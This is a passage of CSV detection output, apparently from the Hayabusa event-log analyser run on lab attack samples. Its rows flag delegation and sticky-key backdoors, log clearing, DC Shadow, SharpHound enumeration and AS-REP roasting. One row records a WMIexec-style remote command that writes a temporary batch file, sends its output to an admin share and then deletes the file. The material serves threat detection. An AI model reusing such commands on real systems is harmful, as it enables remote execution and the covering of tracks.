Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" -2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" -2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" -2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx -2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx -2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47450 : LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34544 : LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 45246 : LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" -2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" -2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" -2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx -2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54633 : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54635 : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.2 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54374 : LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: 192.168.1.100 : Port: 54375 : LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54376 : LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx -2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: 